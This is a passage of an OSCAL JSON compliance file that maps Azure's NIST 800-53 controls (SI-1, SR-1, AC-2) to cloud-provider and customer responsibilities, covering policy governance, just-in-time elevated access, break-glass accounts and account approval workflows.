statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6c91c4ed-627a-4de6-b161-8023ecfc1ae4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-1","statements":[{"uuid":"e0069d02-a75c-4bdb-b34c-f4b1b926e00f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.a","by-components":[{"uuid":"1a932319-c03d-4875-91db-87f1345328b1","export":{"provided":[{"uuid":"14cda4b6-ee00-4b29-969f-cb29540d0c9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"}],"description":"Azure addresses the system and information integrity policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Asset handling * Logging and monitoring Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Asset Classification Standard and Asset Protection Standard and Azure Network Security SOP implement the system and information integrity policy and associated controls and documents the following procedures: * Network access control * Routing control * Boundary protection Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"c966bc19-12eb-4c27-a59a-bc23b7d6790a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and information integrity policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the system and information integrity policy and the associated system and information integrity controls.","provided-uuid":"14cda4b6-ee00-4b29-969f-cb29540d0c9e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9d5d3974-6b53-44b5-9491-2d57153b892b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.b","by-components":[{"uuid":"97b4eb7b-9db4-463c-855c-9a49fc574acc","export":{"provided":[{"uuid":"b778bb18-09ed-4d11-ad8f-0a01e9f95510","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"d278013a-c505-4b16-bbfd-3a6f94a1cd81","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of system and information integrity policy and procedures.","provided-uuid":"b778bb18-09ed-4d11-ad8f-0a01e9f95510"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2b30c51a-4501-4ff8-8d6e-1bdc7ae6dc28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-1_smt.c","by-components":[{"uuid":"d7cc6a6c-b310-4917-9f36-9807ca2c2a4d","export":{"provided":[{"uuid":"a240ff15-e0ba-4f68-9574-4acba7d34f89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"02e07e42-fc72-48a4-96c2-edec9242cf2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-004"}],"description":"The customer is responsible for reviewing and updating the current system and information integrity policy on a regular basis and following organization defined events.","provided-uuid":"a240ff15-e0ba-4f68-9574-4acba7d34f89"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"17f9b270-79e2-4cd6-ac75-4c4f71ee218e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-1","statements":[{"uuid":"22b7a970-a427-4683-b8fa-b883b9ac4265","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.a","by-components":[{"uuid":"3b8c9a41-ed5e-4b72-a0d2-125dc9a58af1","export":{"provided":[{"uuid":"405f0d66-5c1a-4df2-a54a-85574833c72e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"}],"description":"Azure addresses the supply chain risk management policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Ownership of third-party relationships * Security Development Lifecycle (SDL) * Introduction of new hardware, software, or services Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Access Control Standard Operating Procedure (SOP) implements the access control policy and associated controls and documents the following procedures: * Provisioning of Access * Modification and Review of Access Rights * Privilege Management * Inactive User Account Review * Separation of Duties * Remote Access Mechanisms * Session Control Parameters Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"d66813b3-1629-4841-b85a-e3e3dac0ec06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-001"}],"description":"The customer is responsible for developing, documenting, and disseminating supply chain risk management policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the access control policy and procedures and the associated access controls.","provided-uuid":"405f0d66-5c1a-4df2-a54a-85574833c72e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ad94d67e-9923-4bce-bd50-ac1fe7b595ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.b","by-components":[{"uuid":"811c5479-d399-464d-8c16-77f0b81e6838","export":{"provided":[{"uuid":"bdc11591-022a-4ea9-9f24-a5210ddb792d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"6c427b33-7994-4527-82f0-ccfb98ed072e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the access control policy and procedures.","provided-uuid":"bdc11591-022a-4ea9-9f24-a5210ddb792d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"866bbaca-09d7-43b8-8974-9a134c1c6c5b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-1_smt.c","by-components":[{"uuid":"39a8db72-81ad-44e9-9568-887301113fd8","export":{"provided":[{"uuid":"8e334277-46cc-4cf7-9501-7fba1db3e09a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change. The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"ec1b21e1-a7e3-43b9-9013-a2612d4fb163","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-004"}],"description":"The customer is responsible for reviewing and updating the current access control policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current access control procedures on a regular basis and following organization defined events.","provided-uuid":"8e334277-46cc-4cf7-9501-7fba1db3e09a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bbc0ac6c-4447-40d1-ab54-4278e76f9a01","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2","statements":[{"uuid":"7dbdf99a-805f-48f5-8e96-056fc9053e4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.a","by-components":[{"uuid":"2c4f68b2-d297-426d-b195-59a63271d263","export":{"provided":[{"uuid":"dde8d5cd-af55-4141-b19c-3cf34aa3fc3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"}],"description":"Azure accounts are only provided to Microsoft personnel supporting Azure services. Accounts with permissions to internal Azure assets and resources are not provisioned to customers. Azure uses Active Directory (AD) to manage access to implement Role-Based Access Control (RBAC) using AD groups. Microsoft personnel are assigned unique corporate network (CorpNet) AD accounts as part of a standard onboarding to Microsoft. These CorpNet accounts, known as a user's alias, do not have access to any Azure domains by default. For personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. Azure utilizes OneIdentity for both identifier and security group management. Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to Azure. Each domain is specific to the environment. As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial. Below are the different account types that Azure utilizes. Standard Access All personnel with standard access to Azure are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards. For instance, a user with standard access may have the need to review service-specific logs within Azure to identify and diagnose issues. These accounts are considered unprivileged due to the lack of write access. Any additional permissions above standard access requires elevation of access via the Azure Just in Time (JIT) tool, described below. Elevated Access All personnel must use JIT when interactive elevated access is required in the Azure production environment. Except in the case of an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is emergency elevated access, described below. In scenarios where JIT does not yet support management of elevated access, standing access may exist; these gaps in JIT support are identified and tracked as an exception, which requires approval. Software deployment via automated means (i.e., not using an interactive login) does not require interactive login to a resource that is accessed via JIT. In this case, a service team member submits a job (e.g., Pull Request in Azure DevOps), and another team member reviews, approves, and then the safe deployment system deploys. Elevated Access - Emergency Access Azure maintains emergency access accounts with elevated access for use in the scenario that the JIT service is not available. These accounts have persistent elevated access to perform maintenance activities if JIT is unable to provide temporary elevated access. These accounts are carefully managed, only to be used in emergencies, and have notifications associated with their use. Whenever such an account is utilized, a Severity 2 incident ticket is generated that requires the service that owns the resource to investigate and determine whether the access is valid. Network Device Accounts Access to network devices is managed through the Authentication, Authorization, and Accounting (AAA) system, which is configured to allow a specific role-based level of access to Azure Networking network devices via specific AD security groups managed by Azure Networking. There are no user accounts or groups configured in the AAA system, as account and security group access is managed and inherited from the Active Directory infrastructure, with AAA acting as its own directory for the leveraged accounts. The AAA system provides automated mechanisms to support accounts in use for network device access, including integration with network devices for administration access control, and allows for centralized control and auditing of administrative actions in the environment. Service Accounts Non-user, non-interactive service accounts are used to run relevant services. Service accounts are not used for interactive logins. For example, software deployment via automated means does not require interactive login to a resource that would normally be accessed via JIT. In this example, a service team member submits a job, such as a Pull Request in Azure DevOps, and another team member reviews and approves, at which point the Azure Safe Deployment Practices (SDP) automatically deploys. Group, Anonymous, and Temporary Accounts Group or shared accounts are not utilized within Azure unless necessary, where a local account cannot be deleted or disabled or is necessary for emergency access. For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to the credentials and ensures group or shared account usage is uniquely attributable to the user accessing it. This is accomplished by associating the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is uniquely identified, ensuring non-repudiation and attributing user activity to the shared account. Azure accounts are only provided to Microsoft personnel supporting Azure services. Accounts with permissions to internal Azure assets and resources are not provisioned to customers. Azure uses Active Directory (AD) to manage access to implement Role-Based Access Control (RBAC) using AD groups. Microsoft personnel are assigned unique corporate network (CorpNet) AD accounts as part of a standard onboarding to Microsoft. These CorpNet accounts, known as a user's alias, do not have access to any Azure domains by default. For personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. Azure utilizes OneIdentity for both identifier and security group management. Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to Azure. Each domain is specific to the environment. As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.com for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial. Below are the different account types that Azure utilizes. Standard Access All personnel with standard access to Azure are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards. For instance, a user with standard access may have the need to review service-specific logs within Azure to identify and diagnose issues. These accounts are considered unprivileged due to the lack of write access. Any additional permissions above standard access requires elevation of access via the Azure Just in Time (JIT) tool, described below. Elevated Access All personnel must use JIT when interactive elevated access is required in the Azure production environment. Except in the case of an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is Break-Glass elevated access, described below. In scenarios where JIT does not yet support management of elevated access, standing access may exist; these gaps in JIT support are identified and tracked as an exception, which requires approval. Software deployment via automated means (i.e., not using an interactive login) does not require interactive login to a resource that is accessed via JIT. In this case, a service team member submits a job (e.g., Pull Request in Azure DevOps), and another team member reviews, approves, and then the safe deployment system deploys. Elevated Access - Break-Glass Access Azure maintains Break-Glass accounts with elevated access for use in the scenario that the JIT service is not available. These accounts have persistent elevated access to perform maintenance activities if JIT is unable to provide temporary elevated access. These accounts are carefully managed, only to be used in emergencies, and have notifications associated with their use. Whenever such an account is utilized, a Severity 2 incident ticket is generated that requires the service that owns the resource to investigate and determine whether the access is valid. Network Device Accounts Access to network devices is managed through the Authentication, Authorization, and Accounting (AAA) system, which is configured to allow a specific role-based level of access to Azure Networking network devices via specific AD security groups managed by Azure Networking. There are no user accounts or groups configured in the AAA system, as account and security group access is managed and inherited from the Active Directory infrastructure, with AAA acting as its own directory for the leveraged accounts. The AAA system provides automated mechanisms to support accounts in use for network device access, including integration with network devices for administration access control, and allows for centralized control and auditing of administrative actions in the environment. For privileged access, a JIT request is required which grants Read Write (RW) access. Service Accounts Non-user, non-interactive service accounts are used to run relevant services. Service accounts are not used for interactive logins. For example, software deployment via automated means does not require interactive login to a resource that would normally be accessed via JIT. In this example, a service team member submits a job, such as a Pull Request in Azure DevOps, and another team member reviews and approves, at which point the Azure Safe Deployment Practices (SDP) automatically deploys. Group, Anonymous, and Temporary Accounts Group or shared accounts are not utilized within Azure unless necessary, where a local account cannot be deleted or disabled or is necessary for Break-Glass access. For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to the credentials and ensures group or shared account usage is uniquely attributable to the user accessing it. This is accomplished by associating the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is uniquely identified, ensuring non-repudiation and attributing user activity to the shared account."}],"responsibilities":[{"uuid":"58d9a4b1-f732-4ce5-9867-cb0f62c5f558","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-006"}],"description":"The customer is responsible for defining and documenting all customer-controlled account types and accounts within the system. Customers configure Azure through either the Azure Management Portal or the Service Management API (SMAPI). These methods allow customers to create, modify, remove, and monitor storage accounts, hosted services, tenants, roles, and role instances within their subscription.","provided-uuid":"dde8d5cd-af55-4141-b19c-3cf34aa3fc3b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fadb0706-5330-4f13-89e8-acf0edb4c1f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.b","by-components":[{"uuid":"587e4089-bcd7-40eb-aa5d-0b3a00c2e571","export":{"provided":[{"uuid":"9650f36d-6991-4712-aee8-fedea42108bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"}],"description":"All account approvals for Azure go through OneIdentity. All security groups have a primary and secondary owner identified. When a user submits a request, these approvers receive a notification to approve or deny._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c3f5f248-d5b2-44bf-bb1e-b1e1d678bb43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-007"}],"description":"The customer is responsible for assigning managers to the accounts identified in AC-02 Part a.","provided-uuid":"9650f36d-6991-4712-aee8-fedea42108bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"49204de1-8731-42b0-a0dd-1f09349c1d5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.c","by-components":[{"uuid":"022942a7-5d80-4894-a722-1d1600320df1","export":{"provided":[{"uuid":"b18925d3-584c-4c66-809e-abbe7b1db5b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"}],"description":"When an Azure user requests access to any security group, the request is approved by the owner of the group based on the criteria defined for membership. Azure has certain environment-wide conditions, such as screening and training completion, that are met before receiving any Azure account. Additional conditions and criteria are established by the service team. All conditions are enforced by OneIdentity."}],"responsibilities":[{"uuid":"aad13778-0348-485f-90f0-3d906848f134","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-008"}],"description":"The customer is responsible for establishing role and group membership criteria for customer-controlled account types.","provided-uuid":"b18925d3-584c-4c66-809e-abbe7b1db5b7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"14157742-a8d5-4f96-ae26-e77fe5f83a98","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.d","by-components":[{"uuid":"20dd5b9d-1583-4848-abf9-ef4496b01896","export":{"provided":[{"uuid":"b6640c6d-5035-4ff2-91b2-5d998e5feab6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"}],"description":"The Azure service team's management identifies service team personnel who should be given authorization to access the system and specifies the type of privilege each service team personnel should have based on their role. Azure utilizes Role-Based Access Control (RBAC) to identify and control the access privileges of each service team user in accordance with OneIdentity restrictions. Access privileges vary depending on the role a specified service team member assumes within the service team. Access privileges are defined by the service teams in OneIdentity and enforced by Active Directory."}],"responsibilities":[{"uuid":"9fd4abc1-0ea2-44fc-84fd-06804a528f56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-009"}],"description":"The customer is responsible for establishing role and group membership criteria for customer-controlled account types.","provided-uuid":"b6640c6d-5035-4ff2-91b2-5d998e5feab6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eb7e7864-eb6f-4907-86f2-685999d272c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.e","by-components":[{"uuid":"5b72f1b9-8eb7-40af-9455-b2e5561e2afa","export":{"provided":[{"uuid":"dc386a66-ac50-45ba-8932-deb0ac15d5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"}],"description":"All account approvals in Azure, including establishing user accounts, security groups, and service accounts, go through OneIdentity. No access is possible without an approved account. When a user submits a request, the approver identified in AC-02 Part c receives an email notification. Approvers may also go directly to the tool to view a request. The approver follows these steps to approve or deny the request ticket and determine the level of user access: * The approver determines whether the business justification is sufficient. * The approver determines whether the level of user access requested is appropriate. The approver adheres to the principles of least privilege and separation of duties when approving and assigning user access rights and can reject or modify the requested permissions if they are not appropriate. In the case of access requests to multiple services, this may translate into different levels of permissions against the different services to which the user needs access."}],"responsibilities":[{"uuid":"0859e482-8746-48c2-ae5f-defa7d1fb309","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-010"}],"description":"The customer is responsible for requiring personnel to approve the creation of new accounts for the system.","provided-uuid":"dc386a66-ac50-45ba-8932-deb0ac15d5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"14b11511-1821-46e1-a5c9-ac09039e10e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.f","by-components":[{"uuid":"06f518aa-1778-442f-99a1-60cfd5a2b8db","export":{"provided":[{"uuid":"1e323e41-f0d4-4034-ba3b-b2b47a483873","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"}],"description":"Azure personnel are assigned unique corporate network (CorpNet) Active Directory (AD) accounts by Core Services Engineering and Operations (CSEO) as part of a standard onboarding to Microsoft. All Azure access requests and approvals leverage these CorpNet identifiers and are managed through OneIdentity, which is an automated workflow management tool that tracks the process for account request, approval, creation, modification, and deletion. New user accounts refer to accounts of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources._x000D_ _x000D_ _x000D_ _x000D_ Standard Access permits authorized users persistent access to a service's documentation, work items, source code, telemetry, reports, and KPIs, and to submit and/or process deployment jobs using dual-key. Service team approvers create, enable, modify, disable, and remove this access using OneIdentity. Elevated access to the Azure production environment is primarily either dual-key (one user submits, another reviews and 